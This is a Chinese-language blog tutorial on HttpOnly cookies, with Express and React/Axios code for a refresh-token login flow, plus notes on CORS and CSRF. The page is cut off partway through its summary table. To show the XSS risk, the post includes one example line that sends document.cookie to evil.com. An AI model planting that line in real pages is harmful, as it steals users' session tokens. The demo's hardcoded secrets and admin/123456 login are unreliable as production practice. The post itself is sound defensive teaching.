<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>HttpOnly Cookie 全解析 - 小江的技术分享</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="小江的技术分享"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="小江的技术分享"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="&amp;emsp;&amp;emsp;在前端开发中，我们经常与 Cookie 打交道。它是浏览器最原始的数据持久化方案，被广泛用于记录登录状态、用户偏好等信息。然而，Cookie 也是 XSS 攻击的高发地带，尤其是当我们把敏感信息（如 Token）直接暴露在 document.cookie 中时，风险极高。为了解决这一问题，浏览器支持了一个重要的 Cookie 属性：HttpOnly。它是保障 Web 安全的"><meta property="og:type" content="blog"><meta property="og:title" content="HttpOnly Cookie 全解析"><meta property="og:url" content="https://fu9zhou.com/2025/07/22/HttpOnly-Cookie-%E5%85%A8%E8%A7%A3%E6%9E%90/"><meta property="og:site_name" content="小江的技术分享"><meta property="og:description" content="&amp;emsp;&amp;emsp;在前端开发中，我们经常与 Cookie 打交道。它是浏览器最原始的数据持久化方案，被广泛用于记录登录状态、用户偏好等信息。然而，Cookie 也是 XSS 攻击的高发地带，尤其是当我们把敏感信息（如 Token）直接暴露在 document.cookie 中时，风险极高。为了解决这一问题，浏览器支持了一个重要的 Cookie 属性：HttpOnly。它是保障 Web 安全的"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://fu9zhou.com/img/og_image.png"><meta property="article:published_time" content="2025-07-22T11:05:18.000Z"><meta property="article:modified_time" content="2025-07-22T11:05:18.000Z"><meta property="article:author" content="Fu9Zhou"><meta property="article:tag" content="JavaScript"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://fu9zhou.com/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://fu9zhou.com/2025/07/22/HttpOnly-Cookie-%E5%85%A8%E8%A7%A3%E6%9E%90/"},"headline":"HttpOnly Cookie 全解析","image":["https://fu9zhou.com/img/og_image.png"],"datePublished":"2025-07-22T11:05:18.000Z","dateModified":"2025-07-22T11:05:18.000Z","author":{"@type":"Person","name":"Fu9Zhou"},"publisher":{"@type":"Organization","name":"小江的技术分享","logo":{"@type":"ImageObject","url":"https://fu9zhou.com/img/logo.png"}},"description":"&emsp;&emsp;在前端开发中，我们经常与 Cookie 打交道。它是浏览器最原始的数据持久化方案，被广泛用于记录登录状态、用户偏好等信息。然而，Cookie 也是 XSS 攻击的高发地带，尤其是当我们把敏感信息（如 Token）直接暴露在 document.cookie 中时，风险极高。为了解决这一问题，浏览器支持了一个重要的 Cookie 属性：HttpOnly。它是保障 Web 安全的"}</script><link rel="canonical" href="https://fu9zhou.com/2025/07/22/HttpOnly-Cookie-%E5%85%A8%E8%A7%A3%E6%9E%90/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><script>var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?6cc7e72ea91beaff50270729f0b0f860";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();</script><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.png" alt="小江的技术分享" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">文章</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/fu9zhou"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-07-22T11:05:18.000Z" title="2025/7/22 19:05:18">2025-07-22</time>发表</span><span class="level-item"><a class="link-muted" href="/categories/%E5%89%8D%E7%AB%AF/">前端</a><span> / </span><a class="link-muted" href="/categories/%E5%89%8D%E7%AB%AF/%E6%8A%80%E6%9C%AF%E5%AE%9E%E7%8E%B0/">技术实现</a></span><span class="level-item">11 分钟读完 (大约1606个字)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">HttpOnly Cookie 全解析</h1><div class="content"><p>&emsp;&emsp;在前端开发中，我们经常与 Cookie 打交道。它是浏览器最原始的数据持久化方案，被广泛用于记录登录状态、用户偏好等信息。然而，<strong>Cookie 也是 XSS 攻击的高发地带</strong>，尤其是当我们把敏感信息（如 Token）直接暴露在 <code>document.cookie</code> 中时，风险极高。为了解决这一问题，浏览器支持了一个重要的 Cookie 属性：<a target="_blank" rel="noopener" href="https://caniuse.com/?search=HttpOnly">HttpOnly</a>。它是保障 Web 安全的重要方法，很多前后端分离项目在实现登录、权限控制时，都会用到。</p>
<span id="more"></span>

<h1 id="是什么"><a href="#是什么" class="headerlink" title="是什么"></a>是什么</h1><p><code>HttpOnly</code> 是 Cookie 的一个标志属性，它告诉浏览器：</p>
<blockquote>
<p>“<strong>这个 Cookie 只能通过 HTTP 请求发送到服务器，JavaScript 不准访问它。</strong>”</p>
</blockquote>
<p>简单来说，<strong>它是服务端专用的 Cookie</strong>，浏览器在请求时会自动带上它，但 JS 无法通过 <code>document.cookie</code> 访问或修改它。</p>
<p><strong>常见场景：防止 XSS 窃取 Token</strong></p>
<p>在 Web 应用中，如果我们将用户的 <code>access_token</code> 或 <code>refresh_token</code> 存在 <code>localStorage</code> 或普通 Cookie 里，一旦遭遇 XSS 攻击：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 恶意脚本注入</span></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://evil.com/steal?token=&#x27;</span> + <span class="variable language_">document</span>.<span class="property">cookie</span>)</span><br></pre></td></tr></table></figure>

<p>攻击者就可以窃取用户的 Token，伪装成用户发请求。</p>
<p>如果我们使用 <code>HttpOnly</code> Cookie：</p>
<ul>
<li><code>document.cookie</code> 拿不到敏感信息</li>
<li>即使被注入了恶意脚本，也无法读取 Token</li>
</ul>
<p><strong>可以显著提升安全性。</strong>（其实其实，也就一点点）</p>
<h1 id="怎么用"><a href="#怎么用" class="headerlink" title="怎么用"></a>怎么用</h1><blockquote>
<p><strong>HttpOnly Cookie 的关键点不在“如何操作”，而在于“前端请求是否允许携带” + “服务端是否允许接收”</strong>。</p>
</blockquote>
<h2 id="服务端设置-Cookie"><a href="#服务端设置-Cookie" class="headerlink" title="服务端设置 Cookie"></a>服务端设置 Cookie</h2><p>在服务端响应中设置 Cookie，并开启 <code>HttpOnly</code> 属性：</p>
<h3 id="使用-HTTP-头"><a href="#使用-HTTP-头" class="headerlink" title="使用 HTTP 头"></a>使用 HTTP 头</h3><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">Set-Cookie</span><span class="punctuation">: </span>refresh_token=abc123; HttpOnly; Secure; SameSite=Strict; Path=/; Max-Age=604800</span><br></pre></td></tr></table></figure>

<h3 id="使用-Express-携带"><a href="#使用-Express-携带" class="headerlink" title="使用 Express 携带"></a>使用 Express 携带</h3><figure class="highlight ts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">res.<span class="title function_">cookie</span>(<span class="string">&#x27;refresh_token&#x27;</span>, token, &#123;</span><br><span class="line">  <span class="attr">httpOnly</span>: <span class="literal">true</span>,       <span class="comment">// JS 无法访问</span></span><br><span class="line">  <span class="attr">secure</span>: <span class="literal">true</span>,         <span class="comment">// 仅在 HTTPS 下发送</span></span><br><span class="line">  <span class="attr">sameSite</span>: <span class="string">&#x27;strict&#x27;</span>,   <span class="comment">// 防止 CSRF 攻击</span></span><br><span class="line">  <span class="attr">path</span>: <span class="string">&#x27;/&#x27;</span>,</span><br><span class="line">  <span class="attr">maxAge</span>: <span class="number">7</span> * <span class="number">24</span> * <span class="number">60</span> * <span class="number">60</span> * <span class="number">1000</span> <span class="comment">// 一周</span></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong>最佳实践：</strong></p>
<ul>
<li>登录成功时：设置 <code>HttpOnly</code> 的 <code>refresh_token</code>（长期有效）</li>
<li>返回响应体中的 <code>access_token</code>（短期有效）</li>
<li>前端仅保存 <code>access_token</code>，<strong>不保存 <code>refresh_token</code></strong></li>
</ul>
</blockquote>
<h2 id="前端允许携带-Cookie"><a href="#前端允许携带-Cookie" class="headerlink" title="前端允许携带 Cookie"></a>前端允许携带 Cookie</h2><p>在前端发请求时，要显式告诉浏览器：<strong>我要带上 Cookie！</strong></p>
<p>以 Axios 为例：</p>
<figure class="highlight ts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">axios.<span class="title function_">post</span>(<span class="string">&#x27;https://api.example.com/login&#x27;</span>, &#123;</span><br><span class="line">  username,</span><br><span class="line">  password</span><br><span class="line">&#125;, &#123;</span><br><span class="line">  <span class="attr">withCredentials</span>: <span class="literal">true</span> <span class="comment">// 关键配置</span></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>这个配置会让浏览器：</p>
<ul>
<li>自动接收后端设置的 Cookie（包括 HttpOnly 的）</li>
<li>后续请求自动携带这些 Cookie 给后端</li>
</ul>
<h2 id="跨域请求注意事项"><a href="#跨域请求注意事项" class="headerlink" title="跨域请求注意事项"></a>跨域请求注意事项</h2><p>如果你的前后端<strong>不是同一个域名</strong>（如前端在 localhost:5173，后端在 localhost:3000），需要配置<strong>跨域允许携带 Cookie</strong>。</p>
<p>服务端必须设置以下响应头：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">Access-Control-Allow-Origin</span><span class="punctuation">: </span>https://frontend.example.com</span><br><span class="line"><span class="attribute">Access-Control-Allow-Credentials</span><span class="punctuation">: </span>true</span><br></pre></td></tr></table></figure>

<p>否则：</p>
<ul>
<li>浏览器不会接收服务端返回的 Cookie</li>
<li>也不会在请求中自动带上 Cookie</li>
<li>就算设置了 <code>withCredentials: true</code> 也无效</li>
</ul>
<h1 id="局限性"><a href="#局限性" class="headerlink" title="局限性"></a>局限性</h1><p>虽然 <code>HttpOnly</code> 能防止 XSS 读取 Cookie，但它<strong>不能防止 CSRF（跨站请求伪造）</strong>，因为：</p>
<blockquote>
<p>浏览器会<strong>自动携带 Cookie</strong>，哪怕请求是由恶意网站发起的。</p>
</blockquote>
<p><strong>防范 CSRF 的方法：</strong></p>
<ul>
<li>搭配使用 <code>SameSite=Strict</code> 或 <code>Lax</code></li>
<li>使用 CSRF Token 校验机制</li>
</ul>
<h1 id="代码实现"><a href="#代码实现" class="headerlink" title="代码实现"></a>代码实现</h1><h2 id="场景设定"><a href="#场景设定" class="headerlink" title="场景设定"></a>场景设定</h2><p>使用 HttpOnly Cookie 管理 Token（基于 Node.js + React）</p>
<p>我们实现一个最小可运行的登录逻辑：</p>
<ul>
<li>用户登录后，后端返回 <code>access_token</code>，并将 <code>refresh_token</code> 设置为 <code>HttpOnly Cookie</code></li>
<li>后续请求携带 <code>access_token</code>，如果过期，前端请求 <code>/refresh</code>，自动携带 <code>refresh_token</code> 完成续期</li>
</ul>
<h2 id="后端代码"><a href="#后端代码" class="headerlink" title="后端代码"></a>后端代码</h2><p><strong>安装依赖：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">npm install express cookie-parser jsonwebtoken cors</span><br></pre></td></tr></table></figure>

<p><strong>简化版后端逻辑：</strong></p>
<figure class="highlight ts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// server.js</span></span><br><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>)</span><br><span class="line"><span class="keyword">const</span> jwt = <span class="built_in">require</span>(<span class="string">&#x27;jsonwebtoken&#x27;</span>)</span><br><span class="line"><span class="keyword">const</span> cookieParser = <span class="built_in">require</span>(<span class="string">&#x27;cookie-parser&#x27;</span>)</span><br><span class="line"><span class="keyword">const</span> cors = <span class="built_in">require</span>(<span class="string">&#x27;cors&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>()</span><br><span class="line">app.<span class="title function_">use</span>(express.<span class="title function_">json</span>())</span><br><span class="line">app.<span class="title function_">use</span>(<span class="title function_">cookieParser</span>())</span><br><span class="line"></span><br><span class="line"><span class="comment">// 跨域允许前端携带 Cookie</span></span><br><span class="line">app.<span class="title function_">use</span>(<span class="title function_">cors</span>(&#123;</span><br><span class="line">  <span class="attr">origin</span>: <span class="string">&#x27;http://localhost:5173&#x27;</span>,</span><br><span class="line">  <span class="attr">credentials</span>: <span class="literal">true</span></span><br><span class="line">&#125;))</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="variable constant_">SECRET</span> = <span class="string">&#x27;access-secret&#x27;</span></span><br><span class="line"><span class="keyword">const</span> <span class="variable constant_">REFRESH_SECRET</span> = <span class="string">&#x27;refresh-secret&#x27;</span></span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&#x27;/login&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">const</span> &#123; username, password &#125; = req.<span class="property">body</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 简化验证逻辑</span></span><br><span class="line">  <span class="keyword">if</span> (username === <span class="string">&#x27;admin&#x27;</span> &amp;&amp; password === <span class="string">&#x27;123456&#x27;</span>) &#123;</span><br><span class="line">    <span class="keyword">const</span> accessToken = jwt.<span class="title function_">sign</span>(&#123; <span class="attr">user</span>: <span class="string">&#x27;admin&#x27;</span> &#125;, <span class="variable constant_">SECRET</span>, &#123; <span class="attr">expiresIn</span>: <span class="string">&#x27;15s&#x27;</span> &#125;)</span><br><span class="line">    <span class="keyword">const</span> refreshToken = jwt.<span class="title function_">sign</span>(&#123; <span class="attr">user</span>: <span class="string">&#x27;admin&#x27;</span> &#125;, <span class="variable constant_">REFRESH_SECRET</span>, &#123; <span class="attr">expiresIn</span>: <span class="string">&#x27;7d&#x27;</span> &#125;)</span><br><span class="line"></span><br><span class="line">    res.<span class="title function_">cookie</span>(<span class="string">&#x27;refresh_token&#x27;</span>, refreshToken, &#123;</span><br><span class="line">      <span class="attr">httpOnly</span>: <span class="literal">true</span>,</span><br><span class="line">      <span class="attr">secure</span>: <span class="literal">false</span>, <span class="comment">// 本地开发环境设为 false，线上设为 true</span></span><br><span class="line">      <span class="attr">sameSite</span>: <span class="string">&#x27;strict&#x27;</span>,</span><br><span class="line">      <span class="attr">path</span>: <span class="string">&#x27;/&#x27;</span>,</span><br><span class="line">      <span class="attr">maxAge</span>: <span class="number">7</span> * <span class="number">24</span> * <span class="number">60</span> * <span class="number">60</span> * <span class="number">1000</span></span><br><span class="line">    &#125;)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> res.<span class="title function_">json</span>(&#123; <span class="attr">access_token</span>: accessToken &#125;)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  res.<span class="title function_">status</span>(<span class="number">401</span>).<span class="title function_">json</span>(&#123; <span class="attr">message</span>: <span class="string">&#x27;用户名或密码错误&#x27;</span> &#125;)</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&#x27;/refresh&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">const</span> token = req.<span class="property">cookies</span>.<span class="property">refresh_token</span></span><br><span class="line">  <span class="keyword">if</span> (!token) <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">401</span>).<span class="title function_">json</span>(&#123; <span class="attr">message</span>: <span class="string">&#x27;未提供刷新令牌&#x27;</span> &#125;)</span><br><span class="line"></span><br><span class="line">  <span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> payload = jwt.<span class="title function_">verify</span>(token, <span class="variable constant_">REFRESH_SECRET</span>)</span><br><span class="line">    <span class="keyword">const</span> newAccessToken = jwt.<span class="title function_">sign</span>(&#123; <span class="attr">user</span>: payload.<span class="property">user</span> &#125;, <span class="variable constant_">SECRET</span>, &#123; <span class="attr">expiresIn</span>: <span class="string">&#x27;15s&#x27;</span> &#125;)</span><br><span class="line">    res.<span class="title function_">json</span>(&#123; <span class="attr">access_token</span>: newAccessToken &#125;)</span><br><span class="line">  &#125; <span class="keyword">catch</span> (err) &#123;</span><br><span class="line">    res.<span class="title function_">status</span>(<span class="number">401</span>).<span class="title function_">json</span>(&#123; <span class="attr">message</span>: <span class="string">&#x27;刷新失败，请重新登录&#x27;</span> &#125;)</span><br><span class="line">  &#125;</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(<span class="number">3000</span>, <span class="function">() =&gt;</span> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;🚀 Server running on http://localhost:3000&#x27;</span>))</span><br></pre></td></tr></table></figure>

<h2 id="前端代码"><a href="#前端代码" class="headerlink" title="前端代码"></a>前端代码</h2><p><strong>配置 Axios：</strong></p>
<figure class="highlight ts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// api.ts</span></span><br><span class="line"><span class="keyword">import</span> axios <span class="keyword">from</span> <span class="string">&#x27;axios&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> api = axios.<span class="title function_">create</span>(&#123;</span><br><span class="line">  <span class="attr">baseURL</span>: <span class="string">&#x27;http://localhost:3000&#x27;</span>,</span><br><span class="line">  <span class="attr">withCredentials</span>: <span class="literal">true</span>, <span class="comment">// 允许携带 HttpOnly Cookie</span></span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line"><span class="comment">// 自动添加 Authorization header</span></span><br><span class="line">api.<span class="property">interceptors</span>.<span class="property">request</span>.<span class="title function_">use</span>(<span class="function">(<span class="params">config</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">const</span> token = <span class="variable language_">sessionStorage</span>.<span class="title function_">getItem</span>(<span class="string">&#x27;access_token&#x27;</span>)</span><br><span class="line">  <span class="keyword">if</span> (token) &#123;</span><br><span class="line">    config.<span class="property">headers</span>.<span class="property">Authorization</span> = <span class="string">`Bearer <span class="subst">$&#123;token&#125;</span>`</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> config</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line"><span class="keyword">export</span> <span class="keyword">default</span> api</span><br></pre></td></tr></table></figure>

<p><strong>登录逻辑 &amp; 刷新逻辑：</strong></p>
<figure class="highlight tsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// App.tsx</span></span><br><span class="line"><span class="keyword">import</span> <span class="title class_">React</span>, &#123; useState &#125; <span class="keyword">from</span> <span class="string">&#x27;react&#x27;</span></span><br><span class="line"><span class="keyword">import</span> api <span class="keyword">from</span> <span class="string">&#x27;./api&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">App</span>(<span class="params"></span>) &#123;</span><br><span class="line">  <span class="keyword">const</span> [info, setInfo] = <span class="title function_">useState</span>(<span class="string">&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">  <span class="keyword">const</span> <span class="title function_">login</span> = <span class="keyword">async</span> (<span class="params"></span>) =&gt; &#123;</span><br><span class="line">    <span class="keyword">const</span> res = <span class="keyword">await</span> api.<span class="title function_">post</span>(<span class="string">&#x27;/login&#x27;</span>, &#123;</span><br><span class="line">      <span class="attr">username</span>: <span class="string">&#x27;admin&#x27;</span>,</span><br><span class="line">      <span class="attr">password</span>: <span class="string">&#x27;123456&#x27;</span>,</span><br><span class="line">    &#125;)</span><br><span class="line">    <span class="variable language_">sessionStorage</span>.<span class="title function_">setItem</span>(<span class="string">&#x27;access_token&#x27;</span>, res.<span class="property">data</span>.<span class="property">access_token</span>)</span><br><span class="line">    <span class="title function_">setInfo</span>(<span class="string">&#x27;登录成功&#x27;</span>)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">const</span> <span class="title function_">getProtectedData</span> = <span class="keyword">async</span> (<span class="params"></span>) =&gt; &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">      <span class="keyword">const</span> res = <span class="keyword">await</span> api.<span class="title function_">get</span>(<span class="string">&#x27;/protected&#x27;</span>)</span><br><span class="line">      <span class="title function_">setInfo</span>(res.<span class="property">data</span>.<span class="property">message</span>)</span><br><span class="line">    &#125; <span class="keyword">catch</span> (<span class="attr">err</span>: <span class="built_in">any</span>) &#123;</span><br><span class="line">      <span class="keyword">if</span> (err.<span class="property">response</span>.<span class="property">status</span> === <span class="number">401</span>) &#123;</span><br><span class="line">        <span class="comment">// 尝试刷新 token</span></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">          <span class="keyword">const</span> refreshRes = <span class="keyword">await</span> api.<span class="title function_">post</span>(<span class="string">&#x27;/refresh&#x27;</span>)</span><br><span class="line">          <span class="variable language_">sessionStorage</span>.<span class="title function_">setItem</span>(<span class="string">&#x27;access_token&#x27;</span>, refreshRes.<span class="property">data</span>.<span class="property">access_token</span>)</span><br><span class="line">          <span class="title function_">getProtectedData</span>() <span class="comment">// 重新请求</span></span><br><span class="line">        &#125; <span class="keyword">catch</span> &#123;</span><br><span class="line">          <span class="title function_">setInfo</span>(<span class="string">&#x27;登录过期，请重新登录&#x27;</span>)</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> (</span><br><span class="line">    <span class="language-xml"><span class="tag">&lt;<span class="name">div</span>&gt;</span></span></span><br><span class="line"><span class="language-xml">      <span class="tag">&lt;<span class="name">button</span> <span class="attr">onClick</span>=<span class="string">&#123;login&#125;</span>&gt;</span>登录<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span></span><br><span class="line"><span class="language-xml">      <span class="tag">&lt;<span class="name">button</span> <span class="attr">onClick</span>=<span class="string">&#123;getProtectedData&#125;</span>&gt;</span>获取受保护数据<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span></span><br><span class="line"><span class="language-xml">      <span class="tag">&lt;<span class="name">p</span>&gt;</span>&#123;info&#125;<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span></span><br><span class="line"><span class="language-xml">    <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span></span><br><span class="line">  )</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">export</span> <span class="keyword">default</span> <span class="title class_">App</span></span><br></pre></td></tr></table></figure>

<h2 id="逻辑验证"><a href="#逻辑验证" class="headerlink" title="逻辑验证"></a>逻辑验证</h2><ol>
<li>启动服务端：<code>node server.js</code></li>
<li>启动前端（Vite 项目）：<code>npm run dev</code></li>
<li>点击「登录」后会收到 <code>access_token</code> 和后端设置的 <code>refresh_token</code></li>
<li>15 秒后再点击「获取受保护数据」，触发刷新流程</li>
<li>如果 <code>refresh_token</code> 过期，将提示重新登录</li>
</ol>
<h2 id="流程小结"><a href="#流程小结" class="headerlink" title="流程小结"></a>流程小结</h2><table>
<thead>
<tr>
<th>步骤</th>
<th>行为</th>
<th>携带</th>
</tr>
</thead>
<tbody><tr>
<td>登录</td>
<td>后端设置 <code>HttpOnly Cookie</code> 和返回 access_token</td>
<td>access_token (响应体)，refresh_token (Cookie)</td>
</tr>
<tr>
<td>请求</td>
<td>使用 access_token 调用 API</td>
<td><code>Authorization: Bearer xxx</code></td>
</tr>
<tr>
<td>access_token 过期</td>
<td>调用 <code>/refresh</code></td>
<td>Cookie 自动携带 refresh_token</td>
</tr>
<tr>
<td>刷新成功</td>
<td>获取新的 access_token，更新本地存储</td>
<td>-</td>
</tr>
<tr>
